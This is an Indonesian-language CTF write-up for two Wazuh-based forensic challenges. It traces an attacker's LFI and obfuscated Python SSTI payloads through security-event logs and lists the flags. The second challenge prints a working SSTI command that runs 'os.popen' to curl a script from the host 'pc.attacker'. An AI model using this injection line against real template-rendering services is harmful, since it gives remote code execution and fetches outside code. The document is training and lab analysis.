Forensic

ChallengeLink

VWA-WAZUH: The Spectator (100 pts)

VWA-WAZUH: The Overseer (436 pts)

Breached (496 pts)🥈

VWA-WAZUH: The Spectator (100 pts)

Description

-

PoC

Akses wazuh, lalu buka security events dan urutkan berdasarkan level. Berdasarkan referensi dari https://documentation.wazuh.com/current/user-manual/ruleset/rules-classification.html diketahui bahwa semakin tinggi level maka semakin tinggi juga kemungkinan berbahayanya. Karena disini berhubungan dengan penyerangan oleh seorang attacker maka lakukan pengecekan terlebih dahulu pada log-log dengan level yang tinggi.

Dapat dilihat ada beberapa alerts, pada “Local file inclusion” klik dan akan tampil payload yang digunakan oleh attacker untuk melancarkan serangan LFI.

Setelah mengetahui payload attacker maka selanjutnya kami akses honey comb lalu pilih fetcher dan masukkan payload tersebut untuk mendapatkan flag

Flag : INTECHFEST{if-you-know-the-path-you-win-a503d7757b28b50b7aeb741d7607b4ec}

VWA-WAZUH: The Overseer (100 pts)

Description

-

PoC

Akses wazuh, lalu buka security events dan urutkan berdasarkan level. Berdasarkan referensi dari https://documentation.wazuh.com/current/user-manual/ruleset/rules-classification.html diketahui bahwa semakin tinggi level maka semakin tinggi juga kemungkinan berbahayanya. Karena disini berhubungan dengan penyerangan oleh seorang attacker maka lakukan pengecekan terlebih dahulu pada log-log dengan level yang tinggi.

Selanjutnya pilih log dengan description “Python SSTI payload detected”

Pada payload yang digunakan (kolom full_log) terlihat bahwa terdapat %23 yang mana merupakan url encode untuk “#”. Selanjutnya deobfuscate manual, berikut untuk flownya

  • Url decode %23 menjadi #

  • Translate $<payload> menjadi bentuk asli dengan cara melakukan echo payload tersebut

  • Hasil translate menampilkan bentuk \123 yang mana itu merupakan format nilai octal pada python

Berikut contoh untuk translate $<payload>

Hasil dari translate sebagai berikut dan ada beberapa part yang salah(minor) karena hasil decode masih valid

Selanjutnya tinggal print saja misal dengan python

Untuk value setelah echo lakukan base64 decode

Pc.attacker tidak dapat diakses melalui internet, jadi langkah yang kami lakukan adalah mencoba melakukan curl melalui honeycomb. Salah satu cara yang bisa dilakukan adalah dengan memanfaatkan bug yang sama dengan attacker yaitu menjalankan command tersebut pada target dengan service calculator

cycler.__init__.__globals__.os.popen('curl pc.attacker:8080/lr.sh').read()

Flag : INTECHFEST{bash-obfuscation-db326a143a33eef9c7a79e7ec5f4bd09}

Last updated